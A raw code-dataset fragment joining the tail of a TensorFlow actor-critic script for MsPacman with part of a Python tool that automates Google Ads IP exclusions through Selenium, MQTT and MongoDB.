gym\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport random\n\nfrom collections import deque\nfrom tensorflow.layers import dense\nfrom tensorflow.initializers import random_normal as random_normal\nfrom tensorflow.keras.regularizers import l2 as l2_regularizer\nfrom tensorflow.layers import batch_normalization\nfrom tensorflow.keras.initializers import glorot_normal as x_init\n#from tensorflow.contrib.layers import xavier_initializer_conv2d as x_init2d\n\n# Number of frames to use to model motion.\nFRAME_SKIP = 4\n# Size of the image to be resized to.\nIMAGE_SHAPE = [84, 84]\n# Size of the image to put in 84x84x4\nINPUT_SHAPE = [*IMAGE_SHAPE, FRAME_SKIP]\n# Number of classes\nNUM_CL = 10\n# The number of times the session will be run for training\nTRAINING_STEPS = 100000\n# Number of samples to use on each session iteration\nBATCH_SIZE = 128\n# Regularization constant\nREGULARIZATION_BETA = 0.1\n# Learning rate for some optimizers.\nLEARNING_RATE = 0.0001\n# Number of possible actions the player can make.\nNUM_ACT = 9\n# The discount rate\nGAMMA = 0.95\n# The number of environments to use per training step.\nENV_COUNT = 16\n\ndef process(state, prev):\n\trsize1 = cv2.resize(state, tuple(IMAGE_SHAPE))\n\tgrey1 = cv2.cvtColor(rsize1, cv2.COLOR_RGB2GRAY)\n\trsize2 = cv2.resize(prev, tuple(IMAGE_SHAPE))\n\tgrey2 = cv2.cvtColor(rsize2, cv2.COLOR_RGB2GRAY)\n\treturn np.maximum(grey1, grey2)\n\nclass Env:\n\tdef __init__(self, render=False):\n\t\tself.__env = gym.make('MsPacman-v0')\n\t\tself.__env.frame_skip = 1\n\t\tself.__render = render\n\t\tself.__reset()\n\t\tself.__total_rwrd = 0.0\n\n\t\tif render:\n\t\t\tpygame.init()\n\t\t\tself.__env.render()\n\n\tdef step(self, action):\n\t\tstates = tuple(self.__env.step(action) for _ in range(FRAME_SKIP))\n\t\trwrd = sum(s[1] for s in states)\n\t\tdone = any(s[2] for s in states)\n\t\tself.__total_rwrd += rwrd\n\n\t\t# Handle storing the state, and then form an observation.\n\t\tself.__state.popleft()\n\t\tself.__state.append(process(states[-1][0], states[-2][0]))\n\n\t\t# Render if required.\n\t\tif self.__render:\n\t\t\tself.__env.render()\n\n\t\t# If the game is over, we return an empty state.\n\t\tif done:\n\t\t\tt = self.__total_rwrd\n\t\t\tself.__reset()\n\t\t\treturn (\n\t\t\t\tnp.zeros(INPUT_SHAPE),\n\t\t\t\t-t,\n\t\t\t\tdone)\n\t\telse:\n\t\t\treturn (self.obsv, rwrd, done)\n\n\t@property\n\tdef obsv(self):\n\t\treturn np.reshape(self.__state, INPUT_SHAPE)\n\n\tdef __reset(self):\n\t\ts = self.__env.reset()\n\t\tself.__total_rwrd = 0.0\n\t\tself.__state = deque(process(s, s) for _ in range(FRAME_SKIP))\n\nclass Model:\n\tdef __init__(self):\n\t\tself._model()\n\t\tself._loss_fn()\n\t\tself._train_fn()\n\t\tself.__logger = Model.EpisodicPrint()\n\t\tself.sess = tf.keras.backend.get_session()\n\t\t#self.sess.run(tf.global_variables_initializer())\n\n\tdef _model(self):\n\t\tself.input_layer = tf.keras.layers.Input(shape=INPUT_SHAPE)\n\t\tself.__critic_model(self.input_layer)\n\t\tself.__policy_model(self.input_layer)\n\n\tdef __policy_model(self, input_layer):\n\t\t\"\"\"\n\t\tCreates the operation model for tensorflow.\n\t\t\"\"\"\n\t\tself.__policy_layers = [\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Flatten(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\tNUM_ACT,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.Softmax(),\n\t\t]\n\n\t\tout = input_layer\n\t\tfor l in self.__policy_layers:\n\t\t\tout = l(out)\n\n\t\tself.__policy_model = tf.keras.models.Model(\n\t\t\tinputs=input_layer,\n\t\t\toutputs=out)\n\n\t\tself.action = tf.random.categorical(self.__policy_model.output, 1)\n\t\tself.act_eval = tf.keras.backend.function(\n\t\t\tinputs=[self.__policy_model.input],\n\t\t\toutputs=[self.action])\n\n\t\n\tdef __critic_model(self, input_layer):\n\t\t\"\"\"\n\t\tCreates the operation model for tensorflow.\n\t\t\"\"\"\n\t\tself.__critic_layers = [\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Flatten(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t1,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t]\n\n\t\tout = input_layer\n\t\tfor l in self.__critic_layers:\n\t\t\tout = l(out)\n\n\t\tself.__critic_model = tf.keras.models.Model(\n\t\t\tinputs=input_layer,\n\t\t\toutputs=out)\n\n\t\tself.critic_eval = tf.keras.backend.function(\n\t\t\tinputs=[self.__critic_model.input],\n\t\t\toutputs=[out])\n\n\t\t#self.__critic_model = tf.keras.Sequential(self.__critic_layers)\n\n\tdef _loss_fn(self):\n\t\t\"\"\"\n\t\tGets the loss function for training.\n\t\t\"\"\"\n\t\t# The advantage\n\t\tself.rwrd = tf.placeholder(tf.float32, shape=[None])\n\t\tself.fval = tf.placeholder(tf.float32, shape=[None])\n\t\tself.act_choice = tf.placeholder(tf.int64, shape=[None])\n\n\t\tsummand = tf.one_hot(self.act_choice, NUM_ACT)\n\t\tsummand = tf.math.multiply(self.__policy_model.output, summand)\n\t\tsummand = tf.reduce_sum(summand, axis=1)\n\t\t# This maximum step is done to deal with too small\n\t\t# probabilities creating -inf losses, and therefore NaN\n\t\t# variables later on. This was chosen empiracally.\n\t\tsummand = tf.math.log(tf.math.maximum(summand, 1e-30))\n\n\t\tself.policy_loss_fn = tf.reduce_mean(-summand * self.__critic_model.output)\n\n\t\t# Now to define the value loss function\n\t\tself.critic_loss_fn = tf.reduce_sum(\n\t\t\t(self.rwrd + GAMMA * self.fval - self.__critic_model.output)**2)\n\t\t\n\tdef _train_fn(self):\n\t\t\"\"\"\n\t\tConstructs the optimizer.\n\t\t\"\"\"\n\t\tpolicy_train = tf.keras.optimizers.RMSprop(LEARNING_RATE)\n\t\tcritic_train = tf.keras.optimizers.RMSprop(LEARNING_RATE)\n\n\t\tself.policy_train_fn = tf.keras.backend.function(\n\t\t\tinputs=[self.__policy_model.input, self.act_choice],\n\t\t\toutputs=[self.policy_loss_fn],\n\t\t\tupdates=policy_train.get_updates(\n\t\t\t\tparams=self.__policy_model.trainable_weights,\n\t\t\t\tloss=self.policy_loss_fn))\n\n\t\tself.critic_train_fn = tf.keras.backend.function(\n\t\t\tinputs=[self.__critic_model.input, self.rwrd, self.fval],\n\t\t\toutputs=[self.critic_loss_fn],\n\t\t\tupdates=critic_train.get_updates(\n\t\t\t\tparams=self.__critic_model.trainable_weights,\n\t\t\t\tloss=self.critic_loss_fn))\n\n\n\n\tdef train(self):\n\t\tenvs = [Env() for _ in range(ENV_COUNT)]\n\t\tfor step in range(TRAINING_STEPS):\n\t\t\tobsvs = np.stack([e.obsv for e in envs])\n\t\t\tactions = np.reshape(self.act_eval([obsvs])[0], (ENV_COUNT,))\n\n\t\t\t# List of tuples: (state, rwrd, done)\n\t\t\tdata = [e.step(a) for (e, a) in zip(envs, actions)]\n\n\t\t\tloss = self.policy_train_fn([\n\t\t\t\tobsvs,\n\t\t\t\tactions])[0]\n\n\t\t\tadvs = np.reshape(\n\t\t\t\tself.critic_eval([np.stack([e[0] for e in data])])[0],\n\t\t\t\t(ENV_COUNT,))\n\t\t\trwrds = [d[1] for d in data]\n\t\t\tdone = [d[2] for d in data]\n\n\t\t\tloss = self.critic_train_fn([obsvs, rwrds, advs])[0]\n\n\t\t\tself.__logger.handle_data(rwrds, step, done)\n\n\n\tdef evaluate(self):\n\t\tenv = Env(render=True)\n\t\tlast = time.time()\n\t\tdone = False\n\t\treward = 0.0\n\t\twhile not done:\n\t\t\tt = time.time()\n\t\t\tif t - last >= 0.064:\n\t\t\t\taction = self.act_eval([np.reshape(env.obsv, (1, *INPUT_SHAPE))])[0]\n\t\t\t\t(_, r, done) = env.step(action)\t\t\n\t\t\t\treward += r\n\t\t\t\tlast = time.time()\n\t\tprint(\"Total Evaluation Reward: {}\".format(reward))\n\n\tclass EpisodicPrint:\n\t\tdef __init__(self):\n\t\t\tself.rwrds = [[] for _ in range(ENV_COUNT)]\n\n\t\tdef handle_data(self, rwrd, step, done):\n\t\t\tfor (i, r) in enumerate(rwrd):\n\t\t\t\tif r > 0.0:\n\t\t\t\t\tself.rwrds[i].append(r)\n\n\t\t\tfor (i, d) in enumerate(done):\n\t\t\t\tif d:\n\t\t\t\t\tr = sum(self.rwrds[i])\n\t\t\t\t\tprint(\"Total episodic reward: {}\".format(r))\n\t\t\t\t\tself.rwrds[i].clear()\n\n\n\ndef main(args):\n\tmodel = Model()\n\tmodel.train()\n\tmodel.evaluate()\n\nif __name__ == '__main__':\n\timport sys\n\tmain(sys.argv)","sub_path":"tf_examples/deeprl/actor_critic/mspacman.py","file_name":"mspacman.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"608088842","text":"import pymongo\r\nimport paho.mqtt.client as paho\r\nimport threading\r\nfrom queue import Queue\r\nimport datetime\r\nimport time\r\nfrom tkinter import *\r\nfrom tkinter import BOTH, END, HORIZONTAL, Tk, scrolledtext, ttk\r\nfrom datetime import datetime, timedelta, date, time as dt_time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom constants import login, passw\r\n\r\nroot = Tk()\r\nq = Queue()\r\nq2 = Queue()\r\nq3 = Queue()\r\n# MQTT Setting\r\nbroker = \"192.168.1.231\"\r\nTopics = [(\"url\",0), (\"date\",0), (\"time\",0), (\"IP\",0), (\"page\",0), (\"site\",0), (\"brouser\",0)]\r\n# Mongo Setting\r\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydatabase = myclient[\"tvremont\"]\r\nmycol = mydatabase[\"tvrem\"]\r\nmycol_tvremNotGoogl = mydatabase[\"tvremNotGoogl\"]\r\nmycol_tvremBanedForever = mydatabase[\"tvremBanedForever\"]\r\nmycol_tvremBanedToday = mydatabase[\"tvremBanedToday\"]\r\n# Goodl Setting\r\nurlLogin = 'https://accounts.google.com/signin'\r\nurlCompany = \"https://ads.google.com/aw/campaigns?ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001\"\r\nurlTel = 'https://ads.google.com/aw/settings/campaign/search?campaignId=98795004&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelRu = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1699363337&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelRu49 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1636077101&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelRu39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=2001143663&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelOpt39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1825915186&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelOpt49 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1740531111&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelOpt34 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1742888292&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomRu43 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1620167217&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomRu39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1735226790&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomOpt39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1643384377&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomRu34 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1644471505&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomOpt34 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1619439315&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelDict = {'телеф_34_опт': urlTelOpt34, 'телеф_49_опт': urlTelOpt49, 'телеф_39_опт': urlTelOpt39,'телеф_49_ручн': urlTelRu49,'телеф_39_ручн': urlTelRu39, 'телеф': urlTel, 'телеф_ручн': urlTelRu}\r\nurlKomDict = {'комп_34_ручн': urlKomRu34, 'комп_34_опт': urlKomOpt34, 'комп_39_ручн': urlKomRu39, 'комп_43_ручн': urlKomRu43, 'комп_39_ опт': urlKomOpt39}\r\nxpathLogEmail = \"//*[@id='Email']\"\r\nxpathLogEmailBtn = \"//*[@id='next']\"\r\nxpathLogPassw = \"//*[@id='Passwd']\"\r\nxpathLogPasswBtn = \"//*[@id='signIn']\"\r\nxpathSetting = \"//*[@id='cmExtensionPoint-id']//material-button//span\"\r\nxpathTextArea = \"//*[@id='cmExtensionPoint-id']//textarea\"\r\nxpathBanIP = \"//*[@id='cmExtensionPoint-id']//ip-exclusions/material-expansionpanel\"\r\nxpathSave = \"//*[@id='cmExtensionPoint-id']//ip-exclusions/material-expansionpanel//material-yes-no-buttons/material-button[1]/material-ripple\"\r\nxpathCancel = \"//*[@id='cmExtensionPoint-id']//ip-exclusions/material-expansionpanel//material-yes-no-buttons/material-button[2]/material-ripple\"\r\nxpathTableRow1 = \"//*[@id='cmExtensionPoint-id']//div[2]//a\"\r\nxpathTableRow2 = \"//*[@id='cmExtensionPoint-id']//div[3]//a\"\r\nxpathTableRow3 = \"//*[@id='cmExtensionPoint-id']//div[4]//a\"\r\nxpathTableRow4 = \"//*[@id='cmExtensionPoint-id']//div[5]//a\"\r\n#xpathSave = \"//*[@id='cmExtensionPoint-id']//material-button[1]/material-ripple\"\r\n#xpathCancel = \"//*[@id='cmExtensionPoint-id']//material-button[2]/material-ripple\"\r\ndef initAndLogin():\r\n driver.set_window_size(500, 700)\r\n driver.get(urlLogin)\r\n elem = WebDriverWait(driver, 10).until(lambda driver : driver.find_elements_by_id(\"identifierId\"))\r\n elem[0].send_keys(login)\r\n# driver.find_element_by_xpath(\"//*[@id='identifierNext']/content/span\").click()\r\n driver.find_element_by_xpath(\"// *[ @ id = 'identifierNext'] / span / span\").click()\r\n time.sleep(4)\r\n elem = WebDriverWait(driver, 10).until(lambda driver : driver.find_element_by_xpath(\"//*[@id='password']//input\"))\r\n elem.send_keys(passw)\r\n# driver.find_element_by_xpath(\"//*[@id='passwordNext']/content/span\").click()\r\n driver.find_element_by_xpath(\"// *[ @ id = 'passwordNext'] / span / span\").click()\r\n time.sleep(25)\r\n # while inputValue != 1:\r\n # labelConsole['text'] = \"Нажми Login\"\r\n # time.sleep(2)\r\n cookie = {'name': 'foo', 'value': 'bar'}\r\n driver.add_cookie(cookie)\r\n all_cookies = driver.get_cookies()\r\n# print(\"Login OK\")\r\n labelConsole['text'] = \"Login OK\"\r\n\r\ndef openSetting(URL):\r\n driver.get(URL)\r\n try:\r\n WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_xpath(xpathSetting))\r\n# print(\"open Setting URL OK!\")\r\n labelConsole['text'] = \"open Setting URL OK!\"\r\n except Exception as e:\r\n# print(\"wait\",e)\r\n labelConsole['text'] = \"wait\",e\r\n finally:\r\n print(\"finaly\")\r\n labelConsole['text'] = \"finaly\"\r\n # print('open Url OK')\r\n # нажимаем Дополнительные настройки\r\n WebDriverWait(driver, 15).until(lambda driver : driver.find_element_by_xpath(xpathSetting)).click()\r\n # нажимает Исключение IP адресов\r\n print(1)\r\n WebDriverWait(driver, 10).until(lambda driver : driver.find_element_by_xpath(xpathBanIP)).click()\r\n # Список IP\r\n textArea = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTextArea))\r\n# print(\"add IP 1\")\r\n print(2)\r\n textArea.send_keys(Keys.ENTER)\r\n# textArea.send_keys('37.73.241.179')\r\n print(3)\r\n driver.find_element_by_xpath(xpathCancel).click() # кликаем Отмена\r\n labelConsole['text'] = \"openSetting() OK\"\r\n# print(\"openSetting() OK\")\r\n\r\ndef changeURL(URL):\r\n driver.get(URL)\r\n try:\r\n WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_xpath(xpathSetting))\r\n# print(\"open Setting URL OK!\")\r\n labelConsole['text'] = \"open Setting URL OK!\"\r\n except Exception as e:\r\n# print(\"wait\",e)\r\n labelConsole['text'] = \"wait\",e\r\n finally:\r\n print(\"finaly\")\r\n labelConsole['text'] = \"finaly\"\r\n # print('open Url OK')\r\n # нажимаем Дополнительные настройки\r\n WebDriverWait(driver, 15).until(lambda driver : driver.find_element_by_xpath(xpathSetting)).click()\r\n\r\n\r\ndef add_Ban_IP():\r\n try:\r\n driver.find_element_by_xpath(xpathSave).size['width'] != 0 # Проверка на наличие кнопки Сохранить\r\n print(\"кнопка Сохранить\", driver.find_element_by_xpath(xpathSave).size['width'])\r\n driver.find_element_by_xpath(xpathSave).click() # Усли есть, то кликнуть\r\n except:\r\n labelConsole['text'] = \"OK\"\r\n # нажимает Исключение IP адресов\r\n WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathBanIP)).click()\r\n# print(\"click Ban IP\")\r\n textArea = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTextArea))\r\n# print(\"finded TextArea\")\r\n textArea.send_keys(Keys.ENTER) # идём в конец списка\r\n textArea.send_keys(IP) # вводим IP\r\n# print(\"add IP\")\r\n WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathSave)).click() # кликаем Сохранить\r\n labelConsole['text'] = \"IP is added\"\r\n# print(\"IP is added\")\r\n\r\ndef on_message(client, userdata, message):\r\n if message.topic==\"url\":\r\n global url\r\n url=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"date\":\r\n global date\r\n date=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"time\":\r\n global time\r\n time=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"IP\":\r\n global IP\r\n IP=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"page\":\r\n global page\r\n page=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"site\":\r\n global site\r\n site=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"name\":\r\n global name\r\n name=(str(message.payload.decode(\"utf-8\")))\r\n print(name)\r\n elif message.topic==\"comment\":\r\n global comment\r\n comment=(str(message.payload.decode(\"utf-8\")))\r\n print(comment)\r\n elif message.topic==\"brouser\":\r\n global brouser\r\n brouser=(str(message.payload.decode(\"utf-8\")))\r\n mydict = {\"IP\": IP, \"time\": time, \"date\":date, \"url\": url, \"page\": page, \"site\": site, \"brouser\": brouser }\r\n q.put(mydict) # очередь для worker\r\n\r\ndef worker(): # обработка пришедших с сервера данных о посетителях сайта\r\n while worker_flag:\r\n # if (now.strftime(\"%H\") >= \"22\"):\r\n # mycol_tvremBanedToday.drop()\r\n # print(\"mycol_tvremBanedToday drop\")\r\n while not q.empty():\r\n mydict = q.get()\r\n if mydict is None:\r\n continue\r\n try:\r\n count_repit_brouser = 0\r\n count_repit_ip = 0\r\n brouser = mydict[\"brouser\"]\r\n IP = mydict[\"IP\"]\r\n find_url = str(mydict[\"url\"])\r\n br = mycol.find({\"brouser\" : brouser}, {\"repIP\" : 1, \"repBr\": 1, \"IP\": 1, \"date\": 1, \"time\": 1, \"brouser\": 1 })\r\n ip = mycol.find({\"IP\" : IP}, {\"repIP\" : 1, \"repBr\": 1, \"IP\": 1, \"date\": 1, \"time\": 1, \"brouser\": 1 })\r\n request = ['gclid'] # , 'onas'\r\n if any(c in find_url for c in request): # Если пришел из поиска Гугл gclid\r\n q2.put(IP) # передаём в очередь для worker2\r\n q2.put(brouser)\r\n for x in br:\r\n count_repit_brouser = count_repit_brouser + 1 # проверяем есть ли в базе такой brouser и сколько повторов\r\n if (count_repit_brouser >= 1):\r\n mycol.update_one({\"_id\" : x[\"_id\"]}, { \"$set\": {\"repBr\" : count_repit_brouser}})\r\n for y in ip:\r\n count_repit_ip = count_repit_ip + 1 # проверяем есть ли в базе такой ip и сколько повторов\r\n if (count_repit_ip >= 1):\r\n mycol.update_one({\"_id\" : y[\"_id\"]}, { \"$set\": {\"repIP\" : count_repit_ip}})\r\n print(mydict[\"time\"], \" \", brouser)\r\n print(\"Повторов =\", count_repit_brouser, \" IP =\", count_repit_ip, IP )\r\n labelIP['text'] = (mydict[\"time\"] + ' Повторов = ' + str(count_repit_brouser) + ' IP = ' + str(count_repit_ip), str(IP))\r\n scrollTextOut(brouser)\r\n except Exception as e:\r\n print(\"problem with logging \",e)\r\n continue\r\n\r\ndef worker2(): # работа с браузером\r\n initAndLogin()\r\n driver.switch_to.window(driver.window_handles[1])\r\n driver.get(urlCompany)\r\n row1 = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTableRow1))\r\n row2 = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTableRow2))\r\n rows = [row1, row2]\r\n for row in rows:\r\n for key in urlKomDict:\r\n if(row.text == key):\r\n urlKo = urlKomDict[key]\r\n for key in urlTelDict:\r\n if(row.text == key):\r\n urlTe = urlTelDict[key]\r\n print(row1.text)\r\n print(row2.text)\r\n# urlTe = urlTel\r\n# urlKo = urlKomRu39\r\n# initAndLogin()\r\n# print(\"init\")\r\n labelConsole['text'] = \"init\"\r\n while worker_flag:\r\n try:\r\n labelConsole['text'] = \"tel\", urlTe\r\n labelConsole['text'] = \"ko\", urlKo\r\n driver.switch_to.window(driver.window_handles[0]) # вернуться на предыдущую вкладку (с индексом 0)\r\n openSetting(urlTe)\r\n driver.switch_to.window(driver.window_handles[2]) # переключиться на н��вую вкладку (с индексом 1)\r\n openSetting(urlKo)\r\n while True:\r\n if q3.empty() != True:\r\n urlChangeFlag = q3.get() # очередь для смены url рабочей компании из интерфейса пользователя\r\n if (urlChangeFlag == \"Tel\"):\r\n urlTe = q3.get()\r\n driver.switch_to.window(driver.window_handles[0]) # вернуться на предыдущую вкладку (с индексом 0)\r\n changeURL(urlTe)\r\n elif (urlChangeFlag == \"Ko\"):\r\n urlKo = q3.get()\r\n driver.switch_to.window(\r\n driver.window_handles[2]) # переключиться на новую вкладку (с индексом 1)\r\n changeURL(urlKo)\r\n\r\n try:\r\n while not q2.empty():\r\n IP = q2.get()\r\n brouser = q2.get()\r\n mycol_tvremBanedToday.update_one({\"IP\" : IP}, {\"$set\": {\"IP\": IP}}, upsert = True )\r\n brouser_str = str(brouser)\r\n request = ['Linux', 'iPhone']\r\n if any(c in brouser_str for c in request): # Если пришел с телефона\r\n driver.switch_to.window(driver.window_handles[0])\r\n add_Ban_IP()\r\n elif (brouser_str.find(\"Windows\") >= 0): # Если пришел с компа\r\n driver.switch_to.window(driver.window_handles[2])\r\n add_Ban_IP()\r\n else: # Если пришел с ХЗ чего...\r\n print(\"X3\")\r\n except Exception as e:\r\n print(\"ER add IP\", e)\r\n q2.put(IP) # Если ощибра добавления IP в бан, то сохраняем для повторного добавления\r\n q2.put(brouser)\r\n labelConsole['text'] = \"break\"\r\n# print(\"break\")\r\n break\r\n\r\n except Exception as e:\r\n print(3, 'no_Дополнительные настройки', e)\r\n continue\r\n\r\ndef click_btnTel(): # Если нажали кнопку\r\n btnTel.config(fg=\"red\") # меняем цвет текста\r\n btnTelRu.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTel # меняем url рабочей компании\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe) # отправляем в работу браузеру\r\ndef click_btnTelRu():\r\n btnTelRu.config(fg=\"red\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelRu\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTel49():\r\n btnTel49.config(fg=\"red\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelRu49\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTel39():\r\n btnTel39.config(fg=\"red\")\r\n btnTel49.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelRu39\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTelOpt49():\r\n btnTelOpt49.config(fg=\"red\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelOpt49\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTelOpt39():\r\n btnTelOpt39.config(fg=\"red\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelOpt39\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTelOpt34():\r\n btnTelOpt34.config(fg=\"red\")\r\n 